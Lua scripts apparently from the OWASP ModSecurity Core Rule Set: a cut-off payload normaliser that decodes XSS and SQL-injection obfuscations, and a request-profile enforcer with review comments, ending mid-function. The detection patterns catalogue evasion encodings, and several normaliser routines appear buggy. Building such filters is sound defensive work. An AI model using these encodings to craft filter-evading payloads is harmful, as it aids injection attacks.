sHexVal; end function hex2dec (arg) local dec = {} for str in string.gfind(arg, "%w%w") do local str = '0X'..str table.insert(dec, tonumber(str)) end return unpack(dec) end function explode ( seperator, str ) local pos, arr = 0, {} for st, sp in function() return string.find( str, seperator, pos, true ) end do table.insert( arr, string.sub( str, pos, st-1 ) ); pos = sp + 1; end table.insert( arr, string.sub( str, pos ) ); return arr end function oct2dec(octstr) local i, len, num; num = 0; i = 0; octstr = string.reverse(octstr); len = string.len(octstr); if (len > 11) then return 1; end for str in string.gfind(octstr, "%w") do number = tonumber(str); if((number < 0) or 
(number > 7)) then num = 0; return 0; end i = tonumber(i); num_shr = B.lshift(number ,(i*3)); num = B.bor(num,num_shr); i = i + 1; end return num; end function str_split_unique(data) a = {} b = {} -- use table to eliminate duplicates for i=1,string.len(data) do v = string.sub(data,i,i) a[v] = v end -- insert into ordered array and sort for k,v in pairs(a) do table.insert(b,k) end table.sort(b) return b end function str_split(data) a = {} for i=1,string.len(data) do a[i] = string.sub(data,i,i) end return a end -- character table string local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' -- base64 decoding function base64decode(data) data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end function urldecode(s) return (string.gsub (string.gsub (s, "+", " "), "%%(%x%x)", function (str) return string.char (tonumber (str, 16)) end )) end function urlencode(s) return (string.gsub (s, "%W", function (str) return string.format ("%%%02X", string.byte (str)) end )) end function strip_tags(h) local newstr = rex.gsub(h, "<(\/?)(\\w+)[^\>]*>", "%2", nil, 0, 0); return newstr end function hexdecode(s) s = string.gsub(s, "%%(%x%x)", function (h) return string.char(tonumber(h, 16)) end) return s end function sql_hexdecode(s) s = string.gsub(s, "(%x%x)", function (h) return string.char(tonumber(h, 16)) end) return s end --[[ Retrieve all ARGS parameters from ModSec urlDecodeUni, htmlEntityDecode and jsDecode can be used here with the initial extraction of data since they are able to decode any inline value vs. other transformation functions which will attempt to decode the entire string value. 
For those situations, we must create our own Lua functions ]] local args = {}; args = m.getvars("ARGS", {"none"}); -- Only run checks if ARGS are present if (#args == "0") then m.log(4, "# of ARGS: " ..#args.. "."); return nil; end -- Place ARGS data into key/value pairs for inspection for k,v in pairs(args) do name = v["name"]; value = v["value"]; original_value = value; m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. "."); --[[ Start Converter code ]] --[[ Make sure the value to normalize and monitor doesn't contain possibilities for a regex DoS.]] -- remove obvious repetition patterns value = rex.gsub(value, "(?:(.{2,})\\1{32,})|(?:[\-+=|@\\s]{128,})", "x", nil, 0, 0); m.log(4, "Remove repetition patterns: " .. value .. ""); --[[ Check for comments and erases them if available ]] -- check for existing comments if rex.match(value, "(?ms:(?:\\<!\-|\-\->|\\/\\*|\\*\\/|\\/\\/\\W*\\w+\\s*$)|(?:\-\-[^\\-]*\-))", 1) then converted = rex.gsub(value, "(?ms:(?:(?:<!)(?:(?:\-\-(?:[^\\-]*(?:\-[^\\-]+)*)\-\-\\s*)*)(?:>))|(?:(?:\\/\\*\\/*[^\\/\\*]*)+\\*\\/)|(?:\-\-[^\\-]*\-))", ";", nil, 0, 0); value = (value .. "\n" .. converted); m.log(4, "Check for Existing Comments: " .. value .. ""); end -- make sure inline comments are detected and converted correctly value = rex.gsub(value, "(?m:(<\\w+)\\/+(\\w+=?))", "%1/%2", nil, 0, 0); m.log(4, "Remove Inline Comments1: " .. value .. ""); value = rex.gsub(value, "(?m:[^\\\\:]\\/\\/(.*)$)", "/**/%1", nil, 0, 0); m.log(4, "Remove Inline Comments2: " .. value .. ""); --[[ Strip newlines ]] -- check for inline linebreaks value = rex.gsub(value, "\\\\(r|n|f|t|v)", ";", nil, 0, 0); m.log(4, "Check for inline linebreaks: " .. value .. ""); -- replace replacement characters regular spaces value = string.gsub(value, "�", ' ', nil, 0, 0); m.log(4, "Replace replacement chars: " .. value .. ""); -- convert real linebreaks value = rex.gsub(value, "(?m:[\\r\\n\\f\\t\\v])", " ", nil, 0, 0); m.log(4, "Convert real linebreaks: " .. 
value .. ""); --[[ Checks for common charcode pattern and decodes them ]] function convertFromJSCharcode(value) local matches, matches2, matches3; local changed = 0; local sum = 0; local chr = 0; local converted = ""; local tmp_value = value; -- check if value matches typical charCode pattern for line in rex.gmatch(tmp_value, "(?ms:(?:[\\d+-=\/\* ]+(?:\\s?,\\s?[\\d+-=\/\* ]+)){4,})", 0, 0) do if(matches ~= nil) then matches = matches .. "," .. line; else matches = line; end end if(matches ~= nil) then matches = rex.gsub(matches,"(\\s)", ""); matches = rex.gsub(matches,"(\\w+=)", ""); str = explode(",",matches); for i=1, table.getn(str) do chr = str[i]; if(string.len(str[i]) > 0) then chr = rex.gsub(chr,"(?s:\\W0)", ""); if(chr ~= nil) then for line2 in rex.gmatch(chr, "(\\d*[+-\/\* ]\\d+)",0, 0) do if(matches2 ~= nil) then matches2 = matches2 .. "" .. line2; else matches2 = line2; end end if( matches2 ~= nil )then for line3 in rex.split(matches2, "((\\W?\\d+))",0, 0) do if(line ~= nil) then changed = 1; sum = sum + tonumber(line3); end if(matches3 ~= nil) then matches3 = matches3 .. line3; else matches3 = line3; end end end if(changed == 1) then if(sum >= 20) then if(sum <= 127) then converted = converted .. string.char(sum); end end end if(changed == 0) then local num = 0; if(string.len(chr) > 0) then num = tonumber(chr); end converted = converted .. string.char(num); end end value = tmp_value .. "\n" .. converted; end end end end function convertFromJSCharcode_hex(value) -- check for hexadecimal charcode pattern local matches_hex = ""; local converted = ""; local tmp_value = value; for line in rex.gmatch(tmp_value, "(?ims:(?:(?:[\\\\]+\\w+\\s*){8,}))", 0, 0) do if(matches_hex ~= nil) then matches_hex = matches_hex .. "," .. 
line; else matches_hex = line; end end if(matches_hex ~= nil) then matches_hex = rex.gsub(matches_hex,"([ux])", ""); converted = ""; str = explode(",",matches_hex); for i=1, table.getn(str) do chr = str[i]; if(tonumber(chr) ~= 0) then converted = converted .. string.char(hex2dec(chr)); end end value = tmp_value .. "\n" .. converted; end print(value); return value; end function convertFromJSCharcode_oct(value) local matches_oct = ""; local converted_oct = ""; local tmp_value = value; -- check for octal charcode pattern for line in rex.gmatch(tmp_value, "(?ims:(?:(?:[\\\\]+\\d+){8,}))", 0, 0) do if(matches_oct ~= nil) then matches_oct = matches_oct .. "," .. line; else matches_oct = line; end end if(matches_oct ~= nil) then matches_oct = rex.gsub(matches_oct,"(\\s)", ""); str = explode(",",matches_oct); print(str); for i=1, table.getn(str) do chr = str[i]; if (tonumber(str[i]) ~= 0) then n = oct2dec(chr); n = dec2hex(n); if(n ~= 0)then str2 = string.char(hex2dec(n)); if(converted_oct ~= nil) then converted_oct = converted_oct .. str2; else converted_oct = str2; end end end end if(converted_oct ~= nil) then value = tmp_value .. "\n" .. converted_oct; else value = tmp_value; end end print(value); return value; end convertFromJSCharcode(value); m.log(4, "convertFromJSCharcode: " .. value .. ""); convertFromJSCharcode_hex(value); m.log(4, "convertFromJSCharcode_hex: " .. value .. ""); convertFromJSCharcode_oct(value); m.log(4, "convertFromJSCharcode_oct: " .. value .. ""); --[[ Eliminate JS regex modifiers ]] value = rex.gsub(value, "\/[gim]+", "\/", nil, 0, 0); m.log(4, "Eliminate JS regex modifiers: " .. value .. "."); --[[ Converts from hex/dec entities ]] -- deal with double encoded payload function htmlEntityDecode(value) value = rex.gsub(value, "&", "&", nil, 0, 0); local result; local tmp_value = value; for line in rex.gmatch(tmp_value, "(?ms:&#x?([\\w]{2}\\d?);?)", 0, 0) do if(line ~= nil) then if(result ~= nil) then result = result .. 
line; else result = line; end end end if(result ~= nil) then result = sql_hexdecode(result); value = tmp_value .. "\n" .. result; result = rex.gsub(result, ";;", ";", nil, 0, 0); else value = tmp_value; end print(result); return result; end htmlEntityDecode(value); m.log(4, "Converts from hex/dex entities: " .. value .. "."); -- normalize obfuscated protocol handlers value = rex.gsub(value, "(?ms:(?:j\\s*a\\s*v\\s*a\\s*s\\s*c\\s*r\\s*i\\s*p\\s*t\\s*)|(d\\s*a\\s*t\\s*a\\s*))", "javascript", nil, 0, 0); --[[ Normalize Quotes ]] -- normalize different quotes to " value = rex.gsub(value, "[\'\`\´\’\‘]", "\"", nil, 0, 0); m.log(4, "Normalize Quotes: " .. value .. "."); -- make sure harmless quoted strings don't generate false alerts value = rex.gsub(value, "^\"([^\"=\\!><~]+)\"$", "%1", nil, 0, 0); m.log(4, "Harmless Quotes: " .. value .. "."); --[[ Converts SQLHEX to plain text ]] local tmp_value = value; while true do sql_hex_value = rex.match(tmp_value, "(?im:0x([a-fA-F\\d]{2,}[a-fA-F\\d]*)+)"); if (sql_hex_value == nil) then break end m.log(4, "SQL Hex Data: " .. sql_hex_value .. "."); local sql_hex_decoded = sql_hexdecode(sql_hex_value); m.log(4, "SQL Hex Data Decoded: " .. sql_hex_decoded .. "."); tmp_value = rex.gsub(tmp_value, "(?im:0x([a-fA-F\\d]{2,}[a-fA-F\\d]*)+)", sql_hex_decoded, 1, 0, 0); m.log(4, "SQL Hex Data Normalized: " .. tmp_value .. 
"."); end value = rex.gsub(tmp_value, "(?m:0x\\d+)", "1", nil, 0, 0); --[[ Converts basic SQL keywords and obfuscations ]] value = rex.gsub(value, "(?ims:(?:IS\\s+null)|(LIKE\\s+null)|(?:(?:^|\\W)IN[\+\\s]*\([\\s\\d\"]+[^\(\)]*\)))", "\"=0", nil, 0, 0); value = rex.gsub(value, "(?ims:\\W+\\s*like\\s*\\W+)", "1\" OR \"1\"", nil, 0, 0); value = rex.gsub(value, "(?ims:null[,\"\\s])", ",0", nil, 0, 0); value = rex.gsub(value, "(?ims:\\d+\\.)", " 1", nil, 0, 0); value = rex.gsub(value, "(?ims:,null)", ",0", nil, 0, 0); value = rex.gsub(value, "(?ims:between|mod)", "or", nil, 0, 0); value = rex.gsub(value, "(?ims:and\\s+\\d+\.?\\d*)", "", nil, 0, 0); value = rex.gsub(value, "(?ims:\\s+and\\s+)", " or ", nil, 0, 0); value = rex.gsub(value, "(?ims:[^\\w,\(]NULL|\\\\N|TRUE|FALSE|UTC_TIME|LOCALTIME(?:STAMP)?|CURRENT_\\w+|BINARY|(?:(?:ASCII|SOUNDEX|FIND_IN_SET|MD5|R?LIKE)[\+\\s]*\\([^\(\)]+\\))|(?:\-+\\d))", "0", nil, 0, 0); value = rex.gsub(value, "(?ims:(?:NOT\\s+BETWEEN)|(?:IS\\s+NOT)|(?:NOT\\s+IN)|(?:XOR|\\WDIV\\W|\\WNOT\\W|<>|RLIKE(?:\\s+BINARY)?)|(?:REGEXP\\s+BINARY)|(?:SOUNDS\\s+LIKE))", "!", nil, 0, 0); value = rex.gsub(value, "\"\\s+\\d", "\"", nil, 0, 0); value = rex.gsub(value, "\\/(?i:\\d+|null)", "", nil, 0, 0); m.log(4, "Convert SQL Keywords and Obfuscations: " .. value .. "."); --[[ Detects nullbytes and controls chars via ord() ]] -- critical ctrl values value = rex.gsub(value, "(?i:cha?r\\((0|1|2|3|4|5|6|7|8|11|12|14|15|16|17|18|19|24|25|192|193|238|255)\\))", "%%00", nil, 0, 0); m.log(4, "Convert nullbytes and control chars via ord(): " .. value .. 
"."); -- take care for malicious unicode characters value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%E(?:2|3)\%8(?:0|1)\%(?:A|8|9)\\w|\%EF\%BB\%BF|\%EF\%BF\%BD)|(?:&#(?:65|8)\\d{3};?))", "", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%BE))", ">", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%BC))", "<", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%A2))", "\"", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%F0\%80\%A7))", "\'", nil, 0, 0)); value = urldecode(rex.gsub(urlencode(value), "(?i:(?:\%ff1c))", "<", nil, 0, 0)); value = rex.gsub(value, "(?i:(?:&[#x]*(200|820|200|820|zwn?j|lrm|rlm)\\w?;?))", "", nil, 0, 0); value = rex.gsub(value, "(?i:(?:&#(?:65|8)\\d{3};?)|(?:&#(?:56|7)3\\d{2};?)|(?:&#x(?:fe|20)\\w{2};?)|(?:&#x(?:d[c-f])\\w{2};?))", "", nil, 0, 0); value = rex.gsub(value, "(«|〈|<|‹|〈|⟨)", "<", nil, 0, 0); value = rex.gsub(value, "(»|〉|>|›|〉|⟩)", ">", nil, 0, 0); m.log(4, "Malicious unicode characters: " .. value .. ""); --[[ This method matches and translates base64 strings and fragments used in data URIs ]] tmp_value = value; while true do base64_value = rex.match(tmp_value, "([a-zA-Z0-9\+\/]{32,}={0,2})", 1, 0, 0); if (base64_value == nil) then break end m.log(4, "Base64 Data is: " .. base64_value .. "."); base64_value_decoded = base64decode(base64_value); m.log(4, "Base64 Data Decoded is: " .. base64_value_decoded .. "."); tmp_value = rex.gsub(tmp_value, "([a-zA-Z0-9\+\/]{32,}={0,2})", base64_value_decoded, 1, 0, 0); m.log(4, "Base64 Data Normalized: " .. tmp_value .. "."); end value = tmp_value; --[[ Detects nullbytes and controls chars via ord() ]] local mytable = {}; mytable = str_split(value); j = 1 while mytable[j] do if (string.byte(mytable[j]) >= 127) then mytable[j] = rex.gsub(mytable[j], ".*", " ", nil, 0, 0); end j = j + 1 end value = table.concat(mytable); m.log(4, "Detect nullbytes and control chars via ord(): " .. value .. 
"."); --[[ Strip XML patterns ]] converted = strip_tags(value); if (converted ~= value) then value = (value .. "\n" .. converted); m.log(4, "Strip XML patterns: " .. value .. "."); end --[[ This method converts JS unicode code points to regular characters ]] function convertFromJSUnicode(args) local new_value = ""; for line in rex.gmatch(args, "(?ims:\\\\u[0-9a-f]{4})", 0, 0) do hex = print(string.sub(line,3,6)) chr = string.char(hex2dec(string.sub(line,5,7))); if ( new_value == nil ) then new_value = chr; else new_value = new_value .. chr; end end if ( string.len(new_value) > 0 ) then value = new_value .. "\n\\u0001"; end end convertFromJSUnicode(value); m.log(4, "Convert JS unicode code points to regular chars: " .. value .. ""); --[[ Converts relevant UTF-7 tags to UTF-8 ]] value = rex.gsub(value,"\\+ACI\\-","\""); value = rex.gsub(value,"\\+ADw\\-","<"); value = rex.gsub(value,"\\+AD4\\-",">"); value = rex.gsub(value,"\\+AFs\\-","%["); value = rex.gsub(value,"\\+AF0\\-","]"); value = rex.gsub(value,"\\+AHs\\-","{"); value = rex.gsub(value,"\\+AH0\\-","}"); value = rex.gsub(value,"\\+AFw\\-","\\"); value = rex.gsub(value,"\\+ADs\\-",";"); value = rex.gsub(value,"\\+ACM\\-","#"); value = rex.gsub(value,"\\+ACY\\-","&"); value = rex.gsub(value,"\\+ACU\\-","%%"); value = rex.gsub(value,"\\+ACQ\\-","$"); value = rex.gsub(value,"\\+AD0\\-","="); value = rex.gsub(value,"\\+AGA\\-","`"); value = rex.gsub(value,"\\+ALQ\\-","\""); value = rex.gsub(value,"\\+IBg\\-","\""); value = rex.gsub(value,"\\+IBk\\-","\""); value = rex.gsub(value,"\\+AHw\\-","|"); value = rex.gsub(value,"\\+ACo\\-","*"); value = rex.gsub(value,"\\+AF4\\-","%^"); value = rex.gsub(value,"\\+ACIAPg\\-","\">"); value = rex.gsub(value,"\\+ACIAPgA8\\-","\">"); m.log(4, "Convert relevant UTF-7 tags to UTF-8: " .. value .. 
""); --[[ Converts basic concatenations ]] function stripslashes(args) local value = rex.gsub(args,"(\\\\(.?))",""); return value; end function convertFromConcatenated(value) --normalize remaining backslashes if (value ~= rex.gsub(value,"((\\w)\\\\)", "%1")) then value = value .. rex.gsub(value,"((\\w)\\\\)", "%1"); end local compare = stripslashes(value); pattern = { "(?s:(?:<\/\\w+>\+<\\w+>))", "(?s:(?:\":\\d+[^\"\[]+\"))", "(?s:(?:\"?\"\+\\w+\+\"))", "(?s:(?:\"\\s*;[^\"]+\")|(?:\";[^\"]+:\\s*\"))", "(?s:(?:\"\\s*(?:\;|\\+).{8,18}:\\s*\"))", "(?s:(?:\";\\w+=)|(?:!\"\"&&\")|(?:~))", "(?s:(?:\"?\"\\+\"\"?\\+?\"?)|(?:;\\w+=\")|(?:\"[|&]{2,}))", "(?s:(?:\"\\s*\\W+\"))", "(?s:(?:\";\\w\\s*\\+=\\s*\\w?\\s*\"))", "(?s:(?:\"[|&;]+\\s*[^\|\&\\n]*[\|\&]+\\s*\"?))", "(?s:(?:\";\\s*\\w+\\W+\\w*\\s*[\|\&]*\"))", "(?s:(?:\"\\s*\"\\s*\.))", "((?:\\s*new\\s+\\w+\\s*[\\+\\\"\,]))", "((?:(?:^|\\s+)(?:do|else)\\s+))", "((?:(?:^|\\s+)(?:do|else)\\s+))", "((?:[{(]\\s*new\\s+\\w+\\s*[\)\}]))", "((?:(this|self)\.))", "((?:undefined))", "((?:in\\s+))" }; for i=1, table.getn(pattern) do -- strip out concatenations converted = rex.gsub(compare,pattern[i],""); end -- strip object traversal converted = rex.gsub(converted,"(\\w(\.\\w\()))", "%1"); -- normalize obfuscated method calls converted = rex.gsub(converted,"(\\)\\s*\+)", ")"); --convert JS special numbers converted = rex.gsub(converted,"(?ims:(?:\\(*[.\\d]e[\+\-]*[^a-z\\W]+\\)*)|(?:NaN|Infinity)\\W)", "1"); if (converted ~= nil) then if (compare ~= converted) then value = value .. "\n" .. converted; end end -- return value; end convertFromConcatenated(value); m.log(4, "Convert basic concatenations: " .. value .. 
""); --[[ This method collects and decodes proprietary encoding types ]] function convertFromProprietaryEncodings(args) local value = args; --Xajax error reportings value = rex.gsub(value,"(?im:<!\[CDATA\[(.*)\]\]>)","%1", nil, 0, 0); --strip false alert triggering apostrophes value = rex.gsub(value,"(?m:(\\w)\"(s))", "%1%2"); --strip quotes within typical search patterns value = rex.gsub(value,"(^\"([^\"=\\!><~]+)\"/$)", "%1"); --OpenID login tokens value = rex.gsub(value,"({[\\w-]{8,9}\}(?:\{[\w=]{8}\}){2})", ""); --convert Content and \sdo\s to null value = rex.gsub(value,"(?s:Content|\\Wdo)", ""); --strip emoticons value = rex.gsub(value, "(?m:(?:\\s[:;]-[)\/PD]+)|(?:\\s;[)PD]+)|(?:\\s:[)PD]+)|-\.-|\^\^)", ""); --normalize separation char repetion value = rex.gsub(value,"(?m:([.+~=*_;\-])\1{2,})", "%1"); --normalize multiple single quotes value = rex.gsub(value,"(?m:/\"{2,})", "\""); --normalize quoted numerical values and asterisks value = rex.gsub(value,"(?m:\"(\\d+)\")", "%1"); --normalize pipe separated request parameters value = rex.gsub(value,"(?m:\|(\\w+=\\w+))", "&%1"); --normalize ampersand listings value = rex.gsub(value,"((\\w\\s)&\\s(\\w))", "%1%2"); --normalize escaped RegExp modifiers value = rex.gsub(value,"(\/\\\\(\\w))", "/%1"); end convertFromProprietaryEncodings(value); m.log(4, "convertFromProprietaryEncodings: " .. value .. ""); normalized_name = rex.gsub(name, "^(.*)$", "tx.%1_normalized"); m.setvar(normalized_name, value); --[[ This method is the centrifuge prototype ]] m.log(4, "Starting Centrifuge.. Arg Name = " ..name.. " and Arg Value = " ..value.. "."); threshold = 3.49; -- Examine each value if string.len(value) > 25 then local name = name; -- strip padding tmp_value = rex.gsub(value, "\\s{4}|==$", "", nil, 0, 0); m.log(4, "Strip Padding1 - name is: " .. name .. " and value is: " .. tmp_value .."."); tmp_value = rex.gsub(tmp_value, "\\s{4}|[\\p{L}\\d\+\-\=\,\.\%\(\)]{8,}", "aaa", nil, 0, 0); m.log(4, "Strip Padding2 - name is: " .. 
name .. " and value is: " .. tmp_value .."."); -- Check for the attack char ratio tmp_value = rex.gsub(tmp_value, "([\*\.\!\?\+\-])\\1{1,}", "%1", nil, 0, 0); tmp_value = rex.gsub(tmp_value, "\"[\\p{L}\\d\\s]+\"", "", nil, 0, 0); stripped_length = string.len(rex.gsub(tmp_value, "[\\d\\s\\p{L}\.\:\,\%\&\/\>\<\\-)\!\|]+", "", nil, 0, 0)); m.log(4, "stripped_length is: " .. stripped_length .. "."); overall_value = rex.gsub(tmp_value, "([\\d\\s\\p{L}\:\,\.]{3,})+", "aaa", nil, 0, 0); m.log(4, "overall_value is: " .. overall_value .. "."); overall_length = string.len(rex.gsub(overall_value, "\\s{2,}", "", nil, 0, 0)); m.log(4, "overall_length is: " .. overall_length .. "."); if ((stripped_length ~= 0) and (overall_length/stripped_length <= threshold)) then ratio_value = (overall_length/stripped_length); ratio_name = rex.gsub(name, "^(.*)$", "tx.%1_centrifuge_ratio"); m.setvar(ratio_name, ratio_value); m.log(4, "Threshold is: " .. threshold .. " and Ratio Value is: " .. ratio_value .. "."); end end -- Examine each value if string.len(value) > 40 then converted = value; mytable = str_split_unique(converted) j = 1 while mytable[j] do print(mytable[j]) j = j + 1 end converted = table.concat(mytable); m.log(4, "Unique/Sorted: " .. converted .. "."); -- Replace all non-special chars converted = rex.gsub(converted, "[\\w\\s\\p{L},\.:!]", ""); m.log(4, "Replace non-special chars: " .. converted .. "."); -- Normalize certain tokens converted = rex.gsub(converted, "(\\~|\\^|\\||\\*|\\%|\\&|\\/)", "+"); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "(\\+|\\-)\\s*\\d+", "+"); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "(\\(|\\)|\\[|\\]|\\{|\\})", "("); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = rex.gsub(converted, "(\\!|\\?|\\:|\=)", ":"); m.log(4, "Normalize certain tokens: " .. converted .. 
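"."); converted = rex.gsub(converted, "[^:(+]", ""); m.log(4, "Normalize certain tokens: " .. converted .. "."); converted = string.gsub(converted, "\\", ""); m.log(4, "Normalize certain tokens: " .. converted .. "."); mytable = str_split(converted) table.sort(mytable); converted = table.concat(mytable); m.log(4, "Sorted: " .. converted .. "."); stripped_name = rex.gsub(name, "^(.*)$", "tx.%1_centrifuge_converted"); m.setvar(stripped_name, converted); end end if value ~= "." then return ("Normalized Payload: " .. name .. " = " .. value .. ""); else -- Nothing wrong found. return nil; end end
-- Archive member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/appsensor_request_exception_enforce.lua

--[[
  Profile enforcer: compares the current request against the values stored in
  the RESOURCE collection and records every deviation as a TX variable.
  The script only sets TX variables and writes debug-log lines (level 4);
  it takes no disruptive action itself.
]]

--[[
  Returns true when `item` is exactly one entry of the comma-separated `list`.

  The original code called string.find(list, item), which (a) treats the
  request-supplied string as a Lua pattern, so a name containing pattern
  metacharacters can raise "malformed pattern" and abort the whole script, and
  (b) accepts any substring of the list, so a short name is treated as known
  whenever a longer learned name contains it. Comparing whole entries avoids
  both.

  NOTE(review): the profiler code visible on this page appends entries with
  ", " as separator for the character-class lists; the writers of
  enforce_args_names and enforce_request_methods are not visible here and are
  assumed to use the same format - confirm.
]]
local function list_contains(list, item)
    if type(list) ~= "string" or type(item) ~= "string" or item == "" then
        return false
    end
    for entry in string.gmatch(list, "[^,]+") do
        -- Entries are written as "a, b, c": strip the padding before comparing.
        if string.match(entry, "^%s*(.-)%s*$") == item then
            return true
        end
    end
    return false
end

--[[
  Character classes checked by EnforceArgCharClass, in the original order.
    list     - label used in the "... Enforcement list." log line
    class    - label used in the "payload matches ... class." log lines
    key      - infix of the TX violation variables
    resource - RESOURCE variable holding the learned parameter names
    pattern  - Lua pattern a conforming value must match

  NOTE(review): the url and path patterns are not anchored, so string.match
  succeeds as soon as any substring of the value looks like a URL or path; a
  value with arbitrary extra content around it still passes these two classes.
  The profiler uses the same patterns, so tightening them has to be done in
  both scripts together.
]]
local CHAR_CLASSES = {
    { list = "Digits", class = "digit", key = "digits",
      resource = "RESOURCE.enforce_charclass_digits",
      pattern = "^%d+$" },
    { list = "Email", class = "email", key = "email",
      resource = "RESOURCE.enforce_charclass_email",
      pattern = "^[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?$" },
    { list = "Url", class = "url", key = "url",
      resource = "RESOURCE.enforce_charclass_url",
      pattern = "[A-Za-z]+://[A-Za-z0-9-_]+%.[A-Za-z0-9-_.]+/?" },
    { list = "Path", class = "path", key = "path",
      resource = "RESOURCE.enforce_charclass_path",
      pattern = "[-a-zA-Z0-9/._]*/[-a-zA-Z0-9/._]*" },
    { list = "Flag", class = "flag", key = "flag",
      resource = "RESOURCE.enforce_charclass_flag",
      pattern = "^$" },
    { list = "Alpha", class = "alpha", key = "alpha",
      resource = "RESOURCE.enforce_charclass_alphas",
      pattern = "^%a+$" },
    { list = "AlphaNumeric", class = "alphanumeric", key = "alphanumeric",
      resource = "RESOURCE.enforce_charclass_alphanumeric",
      pattern = "^%w+$" },
    { list = "SafeText", class = "safetext", key = "safetext",
      resource = "RESOURCE.enforce_charclass_safetext",
      pattern = "^[a-zA-Z0-9%s_%.%-]+$" },
}

--[[ Entry point: runs every enforcement check in turn and returns nil. ]]
function main()
    --[[ Enforce Request Method ]]
    EnforceRequestMethod()

    --[[ Enforce Number of Parameters/ARGS ]]
    EnforceNumOfArgs()

    --[[ Enforce Parameter Names ]]
    EnforceArgsNames()

    --[[ Enforce Parameter Lengths ]]
    EnforceArgsLength()

    --[[ Enforce Parameter Character Class ]]
    EnforceArgCharClass()

    m.log(4, "Ending Profile Enforcer Script")
    return nil
end

--[[ Begin Enforcement Functions ]]

--[[
  For every request argument, checks its value against each character class
  whose enforcement list names that argument. A mismatch sets
  TX.<name>_<class>_violation to the offending value and
  TX.<class>_violation_name to the argument name.
]]
function EnforceArgCharClass()
    local Args = m.getvars("ARGS", {"none"}) or {}

    -- Read each enforcement list once instead of once per argument.
    local lists = {}
    for i, class in ipairs(CHAR_CLASSES) do
        lists[i] = m.getvar(class.resource)
    end

    for _, arg in pairs(Args) do
        -- Locals: the original leaked name/value into the global environment.
        local name = arg["name"]
        local value = arg["value"]
        m.log(4, "CharClass Check - Arg Name: " ..name.. " and Value: " ..value.. ".")

        for i, class in ipairs(CHAR_CLASSES) do
            if list_contains(lists[i], name) then
                m.log(4, "Arg Name: " .. name .. " in " .. class.list .. " Enforcement list.")
                if string.match(value, class.pattern) then
                    m.log(4, "Parameter " ..name.. " payload matches " .. class.class .. " class.")
                else
                    m.log(4, "Parameter " ..name.. " payload does not match " .. class.class .. " class.")
                    m.setvar("TX." ..name.. "_" .. class.key .. "_violation", value)
                    m.setvar("TX." .. class.key .. "_violation_name", name)
                end
            end
        end
    end
end

--[[
  Compares the length of every argument with the learned
  RESOURCE.<name>_length_min / _length_max values and records a
  TX.<name>_min_length_violation or TX.<name>_max_length_violation.

  An argument without a stored range is skipped: the original compared a
  number with nil in that case, which raises a Lua error and aborts the script
  before the character-class checks run. Unknown argument names are reported
  by EnforceArgsNames, which main() calls first.
]]
function EnforceArgsLength()
    local ArgsLength = m.getvars("ARGS", {"none", "length"}) or {}

    for _, arg in pairs(ArgsLength) do
        local name = arg["name"]
        local value = tonumber(arg["value"])
        local MinArgLength = tonumber(m.getvar("RESOURCE." .. name .. "_length_min", {"none"}))
        local MaxArgLength = tonumber(m.getvar("RESOURCE." .. name .. "_length_max", {"none"}))

        if value == nil or MinArgLength == nil or MaxArgLength == nil then
            m.log(4, "Arg Name: " .. name .. " has no usable length profile; length check skipped.")
        else
            m.log(4, "Arg Name: " ..name.. " and Length: " ..value.. ".")
            if value < MinArgLength then
                m.log(4, "Arg Name: " .. name .. " Length " ..value.. " is below the normal range.")
                m.setvar("TX." .. name .. "_min_length_violation", value)
                m.setvar("TX.MinArgLength", MinArgLength)
                m.setvar("TX.MinArgLengthName", name)
            elseif value > MaxArgLength then
                m.log(4, "Arg Name: " .. name .. " Length " ..value.. " is above the normal range.")
                m.setvar("TX." .. name .. "_max_length_violation", value)
                m.setvar("TX.MaxArgLength", MaxArgLength)
                m.setvar("TX.MaxArgLengthName", name)
            else
                -- Lengths equal to either bound never raised a violation in
                -- the original; they are now logged as in range as well.
                m.log(4, "Arg Name: " .. name .. " with Length: :" ..value.. " is within normal range.")
            end
        end
    end
end

--[[
  Checks every argument name against RESOURCE.enforce_args_names and sets
  TX.args_names_violation for a name that is not an entry of that list.
  Without a stored list there is nothing to compare against, so the check is
  skipped (the original raised a Lua error on the nil list).
]]
function EnforceArgsNames()
    local ArgsNames = m.getvars("ARGS_NAMES", {"none"}) or {}
    local EnforceArgsNames = m.getvar("RESOURCE.enforce_args_names")

    if not EnforceArgsNames then
        m.log(4, "No argument name profile available; name check skipped.")
        return
    end

    for _, arg in pairs(ArgsNames) do
        local name = arg["name"]
        local value = arg["value"]
        m.log(4, "ArgsName: " ..value.. ".")

        if list_contains(EnforceArgsNames, value) then
            m.log(4, "Arg Name: " .. value .. " is valid.")
        else
            m.log(4, "Args Name: " .. value .. " is not valid.")
            m.setvar("TX.args_names_violation", name)
        end
    end
end

--[[
  Sets TX.request_method_violation to "1" when REQUEST_METHOD is not an entry
  of RESOURCE.enforce_request_methods. Skipped when either value is missing
  (the original raised a Lua error in that case).
]]
function EnforceRequestMethod()
    local RequestMethod = m.getvar("REQUEST_METHOD", {"none"})
    local EnforceRequestMethods = m.getvar("RESOURCE.enforce_request_methods")

    if not RequestMethod or not EnforceRequestMethods then
        m.log(4, "No request method profile available; method check skipped.")
        return
    end

    if list_contains(EnforceRequestMethods, RequestMethod) then
        m.log(4, "Request Method " .. RequestMethod .. " already in Enforcement List.")
    else
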